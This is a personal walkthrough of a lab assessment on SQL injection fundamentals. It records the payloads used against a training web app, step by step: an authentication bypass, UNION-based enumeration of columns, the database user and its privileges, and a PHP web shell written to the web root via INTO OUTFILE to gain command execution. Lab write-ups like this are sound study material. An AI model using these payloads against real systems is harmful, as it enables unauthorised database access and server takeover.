Skills Assessment SQL Injection Fundamentals
Task
The company Inlanefreight has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a “grey box” approach, checking for the existence of SQL injection vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered to complete this module. Don’t forget to think outside the box!
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
Attempt
Simple ' didn’t even return an error message. But ' OR 1=1-- - worked and I was able to log in to the payroll information website.
There’s a search function so I tried this payload:
' ORDER BY 5-- -
This worked but 6 didn’t work. So this table has 6 columns.
I tried to find out the current user:
' UNION SELECT NULL,NULL,NULL,USER(),NULL-- -
And got root@localhost. Checked the privileges:
' UNION SELECT 1, 2, 3, grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
The users had FILE privilege.
Checked secure_file_priv to see if I can write data:
' UNION SELECT 1,2,3, variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
It’s empty so it’s not enabled, meaning I can write data.
So I wrote a web shell:
' union select "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
But got Can't create/write to file '/var/www/html/shell.php' (Errcode: 13 "Permission denied") error.
Since out of these three conditions:
- User with
FILEprivilege enabled - MySQL global
secure_file_privvariable not enabled - Write access to the location we want to write to on the back-end server
1 and 2 are met so 3 must be the problem.
I tweaked the path a bit:
' union select "","",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/dashboard/shell.php'-- -
I was able to access http://94.237.59.30:42697/dashboard/shell.php?0=whoami. So now I have to find the flag. ls+/ revealed the flag file flag_cae1dadcd174.txt. I obtained the flag by cat+/flag_cae1dadcd174.txt.